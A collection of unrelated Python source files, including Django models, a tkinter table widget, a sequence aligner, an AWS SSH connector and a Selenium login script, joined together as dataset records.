returns the list of ids from redis key
"""
try:
gmac = GoogleMapsAddressComponent.objects.get(pk=gmac_id)
conn = get_redis_connection()
key = GoogleMapsAddressComponent.get_redis_all_children_key(gmac_id)
length = conn.llen(key)
return conn.lrange(key, 0, length)
except GoogleMapsAddressComponent.DoesNotExist:
return None
def get_children_id_list_from_redis(self):
return GoogleMapsAddressComponent.get_children_id_list_from_redis_by_pk(
self.pk
)
def update_formatted_name(self, commit=True):
elements = []
elements.append(self)
elements.extend(self.get_ancestors())
self.formatted_name = ', '.join([e.long_name for e in elements])
if commit:
self.save()
return self.formatted_name
def get_short_formatted_name(self):
lineage = self.get_lineage()
if len(lineage)>3:
elements = []
elements.append(lineage[0].long_name)
elements.append(lineage[1].long_name)
elements.append(lineage[-1].long_name)
return ', '.join(elements)
else:
return self.formatted_name
@staticmethod
def get_components_from_json(json_string, index=0):
results = []
try:
data = json.loads(json_string)
except json.decoder.JSONDecodeError:
return None
if 'address_components'in data:
components = data['address_components']
elif 'results' in data and len(data['results'])>0:
if 'address_components' in data['results'][index]:
components = data['results'][index]['address_components']
else:
return results
if not components:
return results
for c in components:
if 'political' in c['types']:
results.append(c)
return results
@staticmethod
def filter_components_below(components, component_type='locality'):
results = []
type_found = False
for c in components:
if not type_found:
if component_type in c['types']:
type_found = True
else:
continue
results.append(c)
return results
@staticmethod
def get_component_objects(components=None):
components = components or []
results = []
if len(components)>0 and not 'country' in components[0]['types']:
components.reverse()
parent = None
for c in components:
obj = GoogleMapsAddressComponent.get_or_create(
short_name=c['short_name'],
long_name=c['long_name'],
component_type=c['types'][0],
parent=parent
)
if obj is not None:
results.append(obj)
parent = obj
# Reverse elements
results.reverse()
return results
@staticmethod
def stack_components(components):
first = None
current = None
for c in components:
if first is None:
first = c
current = first
continue
else:
current['parent'] = c
current = current['parent']
current['parent'] = None
return first
@staticmethod
def set_location_data(obj, record):
if 'geometry' in record and record['geometry'] is None:
return None
if 'geometry' in record and 'location' in record['geometry']:
if record['geometry']['location'] is not None:
obj.location = Point(
record['geometry']['location']['lat'],
record['geometry']['location']['lng']
)
if 'geometry' in record and 'bounds' in record['geometry']:
if record['geometry']['bounds'] is not None:
obj.northeast_bound = Point(
record['geometry']['bounds']['northeast']['lat'],
record['geometry']['bounds']['northeast']['lng']
)
obj.southwest_bound = Point(
record['geometry']['bounds']['southwest']['lat'],
record['geometry']['bounds']['southwest']['lng']
)
if 'viewport' in record['geometry']:
if record['geometry']['viewport'] is not None:
obj.northeast_bound = Point(
record['geometry']['viewport']['northeast']['lat'],
record['geometry']['viewport']['northeast']['lng']
)
obj.southwest_bound = Point(
record['geometry']['viewport']['southwest']['lat'],
record['geometry']['viewport']['southwest']['lng']
)
obj.save()
@staticmethod
def get_or_create_from_json(json_string, max_items=None, type_list=None):
type_list = type_list or []
results = []
try:
data = json.loads(json_string)
except json.decoder.JSONDecodeError:
return None
# Create address components
records = data['results']
for index, record in enumerate(records):
try:
components = \
GoogleMapsAddressComponent.get_components_from_json(
json_string, index
)
objects = GoogleMapsAddressComponent.get_component_objects(
components
)
# Find wanted objects
for obj in objects:
if obj is None:
continue
if obj.component_type in type_list and \
obj not in results:
results.append(obj)
# Grab geometry / location info
if (len(objects)> 0) and ('types' in record) \
and ('political' in record['types']):
GoogleMapsAddressComponent.set_location_data(
obj=objects[0],
record=record
)
except MultipleObjectsReturned:
log_path = localities_settings.REVERSE_GEOLOCATION_ERROR_LOG
json_chunk = render_as_json(records[index])
writelog(log_path, json_chunk)
continue
# Finally, return collected results
return results
@staticmethod
def get_or_create_locality_from_json(json_string):
results = GoogleMapsAddressComponent.get_or_create_from_json(
json_string=json_string,
type_list=[
'locality',
'sublocality',
'administrative_area_level_2',
'administrative_area_level_1',
'country'
],
max_items=1
)
if results is not None and len(results)>0:
return results[0]
else:
return None
|
23,147 | 47762355d67470552fa1f74243cbdd5e223b8518 | from django.contrib import admin
from .models import Historia, Genero
# Register your models here.
admin.site.register([Historia, Genero])
|
23,148 | 39d4bf511d9d7d19e7801525d377a2e288fee3d5 | import re, time
from threading import Thread
class TimerManager(Thread):
"""
Usage:
tm = TimerManager()
tm.register_timer(lambda: sys.stdout.write("tactical facepalm"), 'tactical', 0.1, True)
register_timer(proc_addr, 'timer_name', interval, autostart)
1.0 = 1s
0.5 = 0.5s
etc
"""
def __init__(self):
Thread.__init__(self)
self.timer_list = []
def register_timer(self, proc, name, tick_time, auto_start = False):
self.timer_list += [{'Name': name, 'Time': tick_time, 'Active': auto_start, 'Addr': proc, 'Tick': time.time()}]
if len(self.timer_list)>0 and not self.isAlive():
self.start()
def timers(self, proc_name): #Accepting wildcars
return filter(lambda x: True if re.match(proc_name, x['Name']) else False, self.timer_list)
def enable(self, proc_name):
for i in self.timers(proc_name):
i['Tick'] = time.time()
i['Active'] = True
def disable(self, proc_name):
for i in self.timers(proc_name):
i['Active'] = False
def run(self):
self.running = True
while self.running:
start = time.time()
for i in self.timer_list:
if i['Active'] and start - i['Tick'] > i['Time']:
ret = i['Addr']()
i['Tick'] = start
if ret == False:
self.timer_list.remove(i)
time.sleep(0.5)
|
23,149 | 76062e2f72c7053da8cd7c2aa95028a3651bd42d | import numpy as np
from numpy import array
import sys
import random
from Bio import SeqIO
import ast
A, C, G, T = 0, 1, 2, 3
int_to_char = {0:'A', 1:'C', 2:'G', 3:'T'}
scoreMatrix = sys.argv[3]
score = ((open(scoreMatrix)).read()).rstrip("\n")
sc = score.split('\t')
#Assigning values for match and mismatch as derived from the scoring matrix
AA = int(float(sc[5]))#Covers AA and TT
GG = int(float(sc[10])) #Covers GG and CC
AT = int(float(sc[17])) #Covers AT mismatch
AC = int(float(sc[6])) #Covers AC and GT mismatch
AG = int(float(sc[7])) #Covers AG and TC mismatch
GC = int(float(sc[11])) #Covers GC mismatch
best = 0
opt_loc = (0,0)
gap = int(float(sys.argv[4]))
#ACGT by ACGT
scoring = array([[AA,AC,AG,AT],
[AC,GG,GC,AG],
[AG,GC,GG,AC],
[AT,AG,AC,AA]])
#For referencing alignment program with homework problems
'''scoring = array([[2,-1,-1,-1],
[-1,2,-1,-1],
[-1,-1,2,-1],
[-1,-1,-1,2]])'''
fileOne = sys.argv[1]
fileTwo = sys.argv[2]
my_fileOne = open(fileOne)
seqOne = (my_fileOne.read()).rstrip("\n")
my_fileTwo = open(fileTwo)
seqTwo = (my_fileTwo.read()).rstrip("\n")
subject = (list(seqOne))[5:]
query = (list(seqTwo))[5:]
sub = []
que = []
def str_to_int(seq):
result = []
for char in seq:
if char == 'A':
result.append(0)
elif char == 'C':
result.append(1)
elif char == 'G':
result.append(2)
elif char == 'T':
result.append(3)
return result
sub = str_to_int(subject)
que = str_to_int(query)
class AlignmentFinder(object):
def __init__(self, seq1, seq2, best=0, opt_loc=(0,0)):
self.seq1 = seq1
self.seq2 = seq2
self.D = None
def find_gobal_alignment(self):
self.D = np.zeros((self.seq1.size+1, self.seq2.size+1), dtype=np.int16)
self._compute_array()
print self.D
return self._traceback()
def _compute_array(self):
for i in xrange(self.seq1.size+1):
self.D[i,0] = i*gap
for j in xrange(self.seq2.size+1):
self.D[0,j] = j*gap
for i in xrange(1, self.seq1.size+1):
for j in xrange(1, self.seq2.size+1):
self.D[i,j] = max( self.D[i-1, j-1] + self._get_score(i, j),
self.D[i-1, j] + gap,
self.D[i, j-1] + gap)
# track the cell with the largest score
if self.D[i,j] >= best:
self.best = self.D[i,j]
self.optloc = (i,j)
print('The optimal alignment between given sequences has score ' + str(self.best) + '.')
print('The matrix location of the optimal alignment score is ' + str(self.optloc) + '.')
def _get_score(self, i, j):
''' To obtain the correct nucleotide in the sequence, we must
substract 1 to the matrix index. '''
return scoring[self.seq1[i-1], self.seq2[j-1]]
def _get_aligned_pair(self, i, j):
n1 = int_to_char[self.seq1[i-1]] if i>0 else '_'
n2 = int_to_char[self.seq2[j-1]] if j>0 else '_'
return (n1, n2)
def _traceback(self):
alignment= []
i = self.seq1.size
j = self.seq2.size
while i >0 and j>0:
if self.D[i-1, j-1] + self._get_score(i, j) == self.D[i,j]:
alignment.append(self._get_aligned_pair(i, j))
i -= 1
j -= 1
elif self.D[i-1, j] + gap == self.D[i,j]:
alignment.append(self._get_aligned_pair(i, 0))
i -= 1
else:
alignment.append(self._get_aligned_pair(0, j))
j -= 1
while i > 0:
alignment.append(self._get_aligned_pair(i, 0))
i -= 1
while j > 0:
alignment.append(self._get_aligned_pair(0, j))
j -= 1
alignment.reverse()
return alignment
def print_sequences(pairs):
top_seq = []
bottom_seq = []
for (b, t) in pairs:
bottom_seq.append(b)
top_seq.append(t)
for n in top_seq:
print n,
print ' '
for n in bottom_seq:
print n,
if __name__ == "__main__":
s1 = array(sub, dtype=np.int16)
s2 = array(que, dtype=np.int16)
aligner = AlignmentFinder(s1, s2)
pairs = aligner.find_gobal_alignment()
print_sequences(pairs)
|
23,150 | bf0625040f6e4361eed26df0ada69b3becbc1027 | from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.db import models
from django.utils.timezone import now
from jsonfield import JSONField
from model_utils.models import TimeStampedModel
from libraries.models import Library
from readers.models import Reader
class Book(TimeStampedModel):
title = models.CharField(max_length=255)
author = models.CharField(max_length=255, null=True, blank=True)
series = models.ForeignKey('Series', null=True, blank=True)
number_in_series = models.IntegerField(null=True, blank=True)
library = models.ForeignKey(Library)
added_by = models.ForeignKey(User)
meta = JSONField(blank=True)
def __str__(self):
string = self.title
if self.author:
string = "{} by {}".format(string, self.author)
if self.series:
if self.number_in_series:
string = "{} ({} {})".format(
string,
self.series.name,
self.number_in_series,
)
else:
string = "{} ({})".format(string, self.series.name)
return string
def get_absolute_url(self):
return reverse('book-detail', kwargs={'pk': self.id})
def to_dict(self):
blob = {
'title': self.title,
'author': self.author,
'library': self.library.id,
'added_by': self.added_by.id,
'meta': self.meta,
}
if self.series:
blob['series'] = self.series.id
if self.number_in_series:
blob['number_in_series'] = self.number_in_series
return blob
def bookfiles(self):
return BookFileVersion.objects.filter(book=self)
@property
def is_book(self):
return True
@property
def epub(self):
if not hasattr(self, '_epub') or not self._epub:
try:
self._epub = BookFileVersion.objects.filter(
book=self,
filetype=BookFileVersion.EPUB,
)[0]
except (BookFileVersion.DoesNotExist, IndexError):
self._epub = None
return self._epub
@property
def pdf(self):
if not hasattr(self, '_pdf') or not self._pdf:
try:
self._pdf = BookFileVersion.objects.filter(
book=self,
filetype=BookFileVersion.PDF,
)[0]
except (BookFileVersion.DoesNotExist, IndexError):
self._pdf = None
return self._pdf
@property
def mobi(self):
if not hasattr(self, '_mobi') or not self._mobi:
try:
self._mobi = BookFileVersion.objects.filter(
book=self,
filetype=BookFileVersion.MOBI,
)[0]
except (BookFileVersion.DoesNotExist, IndexError):
self._mobi = None
return self._mobi
def get_version_for_kindle(self):
if self.mobi:
return self.mobi
return self.pdf
def get_version_for_other(self):
if self.epub:
return self.epub
return self.pdf
def last_emailed(self, user):
try:
book_email = BookEmail.objects.filter(
book_file__in=self.bookfiles(),
status=BookEmail.SENT,
reader__user=user,
).order_by('-created')[0]
return book_email.created
except (BookEmail.DoesNotExist, IndexError):
return None
class BookFileVersion(TimeStampedModel):
DROPBOX = 'dropbox'
STORAGE_PROVIDERS = (
('dropbox', 'dropbox'),
)
EPUB = 'epub'
PDF = 'pdf'
MOBI = 'mobi'
FILETYPES = (
('epub', 'epub'),
('pdf', 'pdf'),
('mobi', 'mobi'),
)
book = models.ForeignKey('Book')
filetype = models.CharField(max_length=10, choices=FILETYPES)
storage_provider = models.CharField(
max_length=10,
choices=STORAGE_PROVIDERS,
default=DROPBOX,
)
path = models.TextField(null=True)
meta = JSONField()
def __str__(self):
return "{} - {}".format(self.book.title, self.filetype)
class BookEmail(TimeStampedModel):
PENDING = 'pending'
PROCESSING = 'processing'
SENT = 'sent'
ERROR = 'error'
STATUSES = (
('pending', 'pending'),
('processing', 'processing'),
('sent', 'sent'),
('error', 'error'),
)
book_file = models.ForeignKey('BookFileVersion')
reader = models.ForeignKey(Reader,
blank=True,
null=True,
on_delete=models.SET_NULL,
)
status = models.CharField(
max_length=20,
choices=STATUSES,
default=PENDING,
)
def __str__(self):
return "{}: {} to {}".format(
self.status, self.book_file.id, self.reader,
)
class Series(TimeStampedModel):
name = models.CharField(max_length=255)
author = models.CharField(max_length=255, null=True, blank=True)
library = models.ForeignKey(Library)
meta = JSONField(blank=True)
def __str__(self):
return "{} by {}".format(self.name, self.author)
def get_absolute_url(self):
return reverse('series-detail', kwargs={'pk': self.id})
@property
def is_series(self):
return True
class Meta:
verbose_name_plural = 'series'
class Shelf(TimeStampedModel):
name = models.CharField(max_length=255)
library = models.ForeignKey(Library)
meta = JSONField(blank=True)
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('shelf-detail', kwargs={'pk':self.id})
class Meta:
verbose_name_plural = 'shelves'
class BookOnShelf(TimeStampedModel):
book = models.ForeignKey('Book')
shelf = models.ForeignKey('Shelf')
def __str__(self):
return '"{}" on {}'.format(self.book, self.shelf)
class Meta:
verbose_name_plural = 'books on shelves'
|
23,151 | 9b9d4160a9fcb54098d35e4158cebf17d94ec7ca | from django.db.models.aggregates import Avg, Count
from django.db.models.deletion import CASCADE
from django.urls.base import reverse
from category.models import category
from django.db import models
from django.db.models.fields import SlugField
from category.models import category
from account.models import Account
# Create your models here.
class Product(models.Model):
product_name = models.CharField(max_length=200, unique=True)
slug = models.SlugField(max_length=200, unique = True)
description = models.TextField(max_length=500)
price = models.IntegerField()
images = models.ImageField(upload_to='photos/products')
stock = models.IntegerField()
is_available = models.BooleanField(default=True)
category = models.ForeignKey(category, on_delete=models.CASCADE)
created_date = models.DateTimeField(auto_now_add=True)
modified_date = models.DateTimeField(auto_now=True)
def get_url(self):
return reverse('product_details', args = [self.category.slug, self.slug])
def __str__(self):
return self.product_name
def averageReview(self):
reviews = ReviewRating.objects.filter(product = self, status = True).aggregate(average = Avg('rating'))
avg = 0
if reviews['average'] is not None:
avg = float(reviews['average'])
return avg
def countReview(self):
review = ReviewRating.objects.filter(product = self, status = True).aggregate(count = Count('id'))
count = 0
if review['count'] is not None:
count = int(review['count'])
return count
class VariationManager(models.Manager):
def colors(self):
return super(VariationManager, self).filter(variation_category = 'color', is_active = True)
def sizes(self):
return super(VariationManager, self).filter(variation_category = 'size', is_active = True)
variation_category_choices = (
('color', 'color'),
('size', 'size'),
)
class Variation(models.Model):
product = models.ForeignKey(Product, on_delete=models.CASCADE)
variation_category = models.CharField(max_length=100, choices=variation_category_choices)
variation_value = models.CharField(max_length=100)
is_active = models.BooleanField(default=True)
created_date = models.DateTimeField(auto_now=True)
objects = VariationManager()
def __str__(self):
return self.variation_value
class ReviewRating(models.Model):
product = models.ForeignKey(Product, on_delete=models.CASCADE)
user = models.ForeignKey(Account, on_delete=models.CASCADE )
subject = models.CharField(max_length=100, blank=True)
review = models.TextField(max_length=500, blank=True)
rating = models.FloatField()
ip = models.CharField(max_length=20, blank=True)
status = models.BooleanField(default=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __str__(self):
return self.subject
class ProductGallery(models.Model):
product = models.ForeignKey(Product, on_delete=models.CASCADE)
image = models.ImageField(upload_to='store/products', max_length = 255)
def __str__(self):
return self.product.product_name
class Meta:
verbose_name = 'productgallery'
verbose_name_plural = 'Product Gallery'
|
23,152 | 16616d832bbf8f9900f1ee2b028c55cc5560e536 | import tkinter as tk
from tkinter import ttk
import math
class Table(tk.Canvas):
def __init__(self, parent, width, height, number):
tk.Canvas.__init__(self, parent)
self.width = width
self.height = height
self.number = number
self.seatSize = self.width / 10
self.gap = 30
self.players = []
self.activeSeats = 0
self.isClicked = False
self.bind("<Button-1>", self.onClick)
self.configure(width=width, height=height)
self.create_oval(self.seatSize + self.gap, self.seatSize + self.gap,
self.width - self.seatSize - self.gap, self.height - self.seatSize - self.gap, fill="green")
def update(self, width, height):
self.width = width
self.height = height
self.seatSize = self.width / 10
self.gap = 30
self.configure(width=self.width, height=self.height, bd=1, bg="white")
self.create_oval(self.seatSize + self.gap, self.seatSize + self.gap,
self.width - self.seatSize - self.gap, self.height - self.seatSize - self.gap, fill="green")
self.create_text(int(self.width / 2), int(self.height / 2), text=str(self.number), font="Times 38 bold")
center = (self.width / 2, self.height / 2)
lenght = center[0] - self.seatSize
angle = math.acos(-1) / 5
i = 0
while i < self.activeSeats:
x = int(center[0] + lenght * math.cos(angle * i) - self.seatSize / 2)
y = int(center[1] + lenght * math.sin(angle * i) - self.seatSize / 2)
self.create_oval(x, y, x + self.seatSize, y + self.seatSize, fill="red")
i += 1
self.create_text(int(x + self.seatSize / 2), int(y + self.seatSize / 2), text=str(i), font="Times 12 bold")
while i < 10:
x = int(center[0] + lenght * math.cos(angle * i) - self.seatSize / 2)
y = int(center[1] + lenght * math.sin(angle * i) - self.seatSize / 2)
self.create_oval(x, y, x + self.seatSize, y + self.seatSize, fill="green")
i += 1
self.create_text(int(x + self.seatSize / 2), int(y + self.seatSize / 2), text=str(i), font="Times 12 bold")
def setPlayers(self, players):
self.players = players
self.activeSeats = len(self.players)
def onClick(self, event):
self.isClicked = True |
23,153 | 89aaf182676e5a3bd5e7a156107a9abce40411ac | #!/usr/bin/env python
from abc import ABCMeta, abstractmethod
import argparse
import subprocess
import os
import sys
from typing import Any, Dict, List, Union
from aws_utils.instance_utils import format_instance, AwsInstance
# Ithemal runs on Python 2 mostly
try:
input = raw_input
except NameError:
pass
class InstanceConnectorABC(AwsInstance):
__metaclass__ = ABCMeta
@abstractmethod
def connect_to_instance(self, instance):
# type: (Dict[str, Any]) -> None
return NotImplemented
class InstanceConnector(InstanceConnectorABC):
def __init__(self, identity, host, root, com):
# type: (str, str, bool, List[str]) -> None
super(InstanceConnector, self).__init__(identity, require_pem=True)
self.host = host
self.root = root
self.com = com
def connect_to_instance(self, instance):
# type: (Dict[str, Any]) -> None
ssh_address = 'ec2-user@{}'.format(instance['PublicDnsName'])
ssh_args = ['ssh', '-X', '-i', self.pem_key, '-t', ssh_address]
if self.com:
conn_com = "bash -lc '{}'".format(' '.join(self.com).replace("'", r"\'"))
else:
conn_com = "bash -lc '~/ithemal/aws/aws_utils/tmux_attach.sh || /home/ithemal/ithemal/aws/aws_utils/tmux_attach.sh'"
if self.host:
ssh_args.append(conn_com)
else:
if self.root:
user = 'root'
else:
user = 'ithemal'
ssh_args.append('sudo docker exec -u {} -it ithemal {}'.format(user, conn_com))
os.execvp('ssh', ssh_args)
sys.exit(1)
def list_instances(instances):
# type: (List[Dict[str, Any]]) -> None
if not instances:
print('No instances running!')
return
for i, instance in enumerate(instances):
print('{}) {}'.format(i + 1, format_instance(instance)))
def interactively_connect_to_instance(aws_instances):
# type: (InstanceConnectorABC) -> None
while True:
instances = aws_instances.get_running_instances()
if not instances:
print('No instances to connect to!')
return
elif len(instances) == 1:
aws_instances.connect_to_instance(instances[0])
return
list_instances(instances)
try:
res = input('Enter a number to connect to that instance, or "q" to exit: ')
except KeyboardInterrupt:
return
except EOFError:
return
if res[0].lower() == 'q':
return
else:
try:
index_to_connect = int(res)
except ValueError:
print('"{}" is not an integer.'.format(res))
continue
if index_to_connect < 1 or index_to_connect > len(instances):
print('{} is not between 1 and {}.'.format(index_to_connect, len(instances)))
continue
instance = instances[index_to_connect - 1]
aws_instances.connect_to_instance(instance)
return
def connect_to_instance_id_or_index(aws_instances, id_or_index):
# type: (InstanceConnectorABC, str) -> None
instances = aws_instances.get_running_instances()
if len(instances) == 0:
print('No instances to connect to!')
try:
idx = int(id_or_index)
if idx <= 0 or idx > len(instances):
print('Provided index must be in the range [{}, {}]'.format(1, len(instances)))
return
aws_instances.connect_to_instance(instances[idx - 1])
except ValueError:
pass
possible_instances = [instance for instance in instances if instance['InstanceId'].startswith(id_or_index)]
if len(possible_instances) == 0:
raise ValueError('{} is not a valid instance ID or index'.format(id_or_index))
elif len(possible_instances) == 1:
aws_instances.connect_to_instance(possible_instances[0])
else:
raise ValueError('Multiple instances have ambiguous identifier prefix {}'.format(id_or_index))
def main():
# type: () -> None
parser = argparse.ArgumentParser(description='Connect to a running AWS EC2 instance')
user_group = parser.add_mutually_exclusive_group()
user_group.add_argument('--host', help='Connect directly to the host', default=False, action='store_true')
user_group.add_argument('--root', help='Connect to root in the Docker instance', default=False, action='store_true')
user_group.add_argument('--list', help='Just list the instances, rather than connecting', default=False, action='store_true')
parser.add_argument('identity', help='Identity to use to connect')
parser.add_argument('instance_id', help='Instance IDs to manually connect to', nargs='?', default=None)
parser.add_argument('--com', help='Command to run (uninteractive)', nargs='+')
args = parser.parse_args()
aws_instances = InstanceConnector(args.identity, args.host, args.root, args.com)
if args.list:
list_instances(aws_instances.get_running_instances())
return
if args.instance_id:
connect_to_instance_id_or_index(aws_instances, args.instance_id)
else:
interactively_connect_to_instance(aws_instances)
if __name__ == '__main__':
main()
|
23,154 | 0424887a22393e7cc096f97be79e3b17a368036f | def hamming(firstStrand, secondStrand):
limit = min(len(firstStrand), len(secondStrand))
distance = 0
for i in range(limit):
if firstStrand[i] != secondStrand[i]:
distance = distance + 1
return distance + max (len(firstStrand), len(secondStrand)) - limit
|
23,155 | bbc13c4edb87fc945ef64764e6ad7a34166ed87a | import re
class token():
def __init__(self, val, fil='', line=0, char=0):
self.val = val
self.metadata = [self.fil, self.line, self.char] = fil, line, char
self.__repr__ = lambda: str(self.val)
self.listfy = lambda: self.val
def tokenify(s, fil='', line=0, char=0):
return s if isinstance(s, token) else token(s, fil, line, char)
def detokenify(s):
return s.val if isinstance(s, token) else s
class astnode():
def __init__(self, fun, args, fil='', line=0, char=0):
self.fun = detokenify(fun)
self.args = args
self.metadata = [self.fil, self.line, self.char] = fil, line, char
self.listfy = lambda: [self.fun] + map(lambda x: x.listfy(), self.args)
def __repr__(self):
o = '(' + self.fun
subs = map(repr, self.args)
k = 0
out = ' '
while k < len(subs) and o != '(seq':
if '\n' in subs[k] or len(out + subs[k]) >= 80:
break
out += subs[k] + ' '
k += 1
if k < len(subs):
o += out + '\n '
o += '\n'.join(subs[k:]).replace('\n', '\n ')
o += '\n)'
else:
o += out.rstrip() + ')'
return o
def nodeify(s, fil='', line=0, char=0):
if isinstance(s, astnode):
metadata = s.metadata
fun = s.fun
nodes = map(lambda x: nodeify(x, *s.metadata), s.args)
elif isinstance(s, (token, str, unicode, int, long)):
return tokenify(s)
else:
metadata = fil, line, char
fun = s[0].val if isinstance(s[0], token) else s[0]
nodes = map(lambda x: nodeify(x, *metadata), s[1:])
return astnode(fun, nodes, *metadata)
is_numeric = lambda x: isinstance(x, (int, long))
is_string = lambda x: isinstance(x, (str, unicode))
# A set of methods for detecting raw values (numbers and strings) and
# converting them to integers
def frombytes(b):
return 0 if len(b) == 0 else ord(b[-1]) + 256 * frombytes(b[:-1])
def fromhex(b):
hexord = lambda x: '0123456789abcdef'.find(x)
return 0 if len(b) == 0 else hexord(b[-1]) + 16 * fromhex(b[:-1])
def is_numberlike(b):
if isinstance(b, (str, unicode)):
if re.match('^[0-9\-]*$', b):
return True
if b[0] in ["'", '"'] and b[-1] in ["'", '"'] and b[0] == b[-1]:
return True
if b[:2] == '0x':
return True
return False
def log256(x):
return 0 if x == 0 else (1 + log256(x / 256))
def tobytearr(n, L):
return [] if L == 0 else tobytearr(n / 256, L - 1) + [n % 256]
def numberize(b):
if is_numeric(b):
return b
elif b[0] in ["'", '"']:
return frombytes(b[1:-1])
elif b[:2] == '0x':
return fromhex(b[2:])
else:
return int(b)
|
23,156 | b662b5186fe71299a0515710f9ffa0f6141a3727 | #coding: utf8
import math
import copy
import sys
def printe(inp):
sys.stderr.write(repr(inp)+'\n')
#sys.stderr.flush()
def readline():
return map(int, raw_input().split())
def solve():
m, k = readline()
favorite = set(readline())
n = int(raw_input())
l_name = []
n_actors = []
ind_actors = []
min_fav_actors = []
max_fav_actors = []
for i in range(n):
l_name = raw_input()
n_actors = int(raw_input())
ind_actors = readline()
num_zero = ind_actors.count(0)
min_fav_actors = len(favorite & set(ind_actors))
max_fav_actors = min_fav_actors + ind_actors.count(0)
printe([min_fav_actors, max_fav_actors])
if __name__ == '__main__':
try:
f_in = open("input.txt")
f_out = open("output.txt", 'w')
FLAG_FILE = True
except IOError:
FLAG_FILE = False
else:
sys.stdin = f_in
sys.stdout = f_out
solve()
if FLAG_FILE:
f_in.close()
f_out.close()
|
23,157 | 59e28314f976825061cbe1951f1a5b55b42e55d3 | inp = ['E', 'C', "N", 'U', 'Impossible', 'ACM']
ou = ['Excellent', 'Cheer', 'Nice', 'Ultimate', "I'm possible", 'Accept More']
for i in range(int(input())):
a = input()
for num in range(6):
if (a == inp[num]):
print(ou[num])
break
|
23,158 | 70683fae9d3f19326a4af780feaf99ec9c731bbe | import time
from selenium import webdriver
# Browser exposes an executable files
# Selenium test will invoke this executable file and with help of this we can automatically invoke browser
from selenium.webdriver.chrome.webdriver import WebDriver
driver: WebDriver = webdriver.Chrome(executable_path="C:\\chromedriver_win32\\chromedriver.exe")
#maximize browser
driver.maximize_window()
driver.get("https://stage-www.keyflow.com/en/profile/login")
print(driver.title)
print(driver.current_url)
#Enter data to the textboxes
driver.find_element_by_name("phone").send_keys("+46761177777")
driver.find_element_by_name("password").send_keys("testerQA123")
driver.find_element_by_tag_name("BUTTON").click()
#Click on profile
time.sleep(5)
Var = driver.find_element_by_xpath("//header/div[1]/div[2]/nav[1]/ul[1]/li[4]/div[1]/div[3]/div[1]/figure[1]/div[1]").click()
print(driver.current_url)
#To fetch age from profile page
print(driver.find_element_by_xpath("//html[1]/body[1]/div[1]/div[1]/div[2]/div[2]/div[1]/h1[1]").text)
#//body/div[@id='app']/div[1]/div[2]/div[2]/div[1]/h1[1]
|
23,159 | 3452b463c8616f1058daebe5d6186c3beaf62390 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: NetworkRanger
# Date: 2019/8/11 2:14 PM
from django.db import models
class Tweet(models.Model):
text = models.CharField(max_length=140)
author_email = models.CharField(max_length=200)
created_at = models.DateTimeField(auto_now_add=True)
published_at = models.DateTimeField(null=True)
STATE_CHOICES = (
('pending', 'pending'),
('published', 'published'),
('rejected', 'rejected'),
)
state = models.CharField(max_length=15, choices=STATE_CHOICES)
def __unicode__(self):
return self.text
def Meta(self):
permissions = (
("can_approve_or_reject_tweet",
"Can approve or reject tweets")
)
class Comment(models.Model):
tweet = models.ForeignKey(Tweet)
text = models.CharField(max_length=300)
created_at = models.DateTimeField(auto_now_add=True)
def __unicode__(self):
return self.text |
23,160 | 98ff7263e73a04cbeb77cd19ee9cfd43b2742fdd | import pdb
import json
from collections import Counter, defaultdict
num_of_point_in_mcg_json = defaultdict(int)
num_of_point_in_coco_json = defaultdict(int)
with open("datasets/coco/annotations/coco_train_mcg.json") as f:
myjson = json.load(f)
annotations = myjson["annotations"]
print("There are totoal {0} annotations".format(len(annotations)))
# error_idx = []
for i, ann in enumerate(annotations):
num = len(ann["segmentation"][0])
num_of_point_in_mcg_json[num] += 1
# if num < 6: # less than 6 point will cause error
# error_idx.append(i)
with open("datasets/coco/annotations/instances_train2017.json") as f:
myjson = json.load(f)
annotations = myjson["annotations"]
print("There are totoal {0} annotations".format(len(annotations)))
for i, ann in enumerate(annotations):
if ann["iscrowd"] == 1:
continue
# if isinstance(ann["segmentation"], list):
num = len(ann["segmentation"][0])
num_of_point_in_coco_json[num] += 1
# else:
# pdb.set_trace()
# print(ann)
#print(dict(sorted(num_of_point_in_coco_json.items())))
import pprint
pp = pprint.PrettyPrinter(indent=4)
print("num_of_point_in_mcg_json:")
print(dict(sorted(num_of_point_in_mcg_json.items())))
pp.pprint(num_of_point_in_mcg_json)
print("num_of_point_in_coco_json:")
print(dict(sorted(num_of_point_in_coco_json.items())))
pp.pprint(num_of_point_in_coco_json)
# pdb.set_trace() |
23,161 | 8aedb5175be63397efe3b17c09d49cce875f1bb6 | from __future__ import unicode_literals
__version__ = '2015.12.13'
|
23,162 | 5a65ad26f1279821ae2519062d01e263ff901874 | from __future__ import division, print_function
import pickle
import os
os.environ["JSON_GLOB"]="null"
os.environ["PICKLE_GLOB"]="null"
os.environ["USE_POSTREFINE"]="null"
os.environ["MODEL_MODE"]="null"
from LS49.work2_for_aca_lsq.abc_background import fit_roi_multichannel # implicit import
from scitbx.array_family import flex
abc_glob_dials_refine = "/global/cscratch1/sd/nksauter/proj-paper1/work/abc_coverage_dials_refine/abcX%06d.pickle"
abc_glob_pixel_refine = "/global/cscratch1/sd/nksauter/proj-paper1/work/abc_coverage_pixel_refine/abcX%06d.pickle"
from scitbx.matrix import col
deltafast = flex.double()
deltaslow = flex.double()
from matplotlib import pyplot as plt
ikeys = flex.int()
ang2 = flex.double()
ang3 = flex.double()
with open("slurm22693509.out","r") as F:
for line in F:
if "LLG" in line:
tokens = line.split()
ikeys.append( int(tokens[2]) )
ang2.append( float(tokens[22][:-1]) )
ang3.append( float(tokens[23][:-1]) )
ang2*=0.01
ang3*=0.01
statsang2 = flex.mean_and_variance(ang2)
print("Ang2 stats, mean, stddev=",statsang2.mean(),
statsang2.unweighted_sample_standard_deviation(),"on N=",len(ang2))
statsang3 = flex.mean_and_variance(ang3)
print("Ang3 stats, mean, stddev=",statsang3.mean(),
statsang3.unweighted_sample_standard_deviation())
fig, ax = plt.subplots()
# the histogram of the data
n, bins, patches = ax.hist(ang2, bins=40, normed=0, histtype="step", range=(-0.04,0.04), color='blue')
n, bins, patches = ax.hist(ang3, bins=40, normed=0, histtype="step", range=(-0.04,0.04), color='red')
ax.set_xlabel('Angular reset (degrees)')
ax.set_ylabel('Count')
ax.set_title(r'Histogram of angle2, 3 rotational shift')
# commented code for scatter plot
#plt.plot(deltaslow,deltafast,"b,")
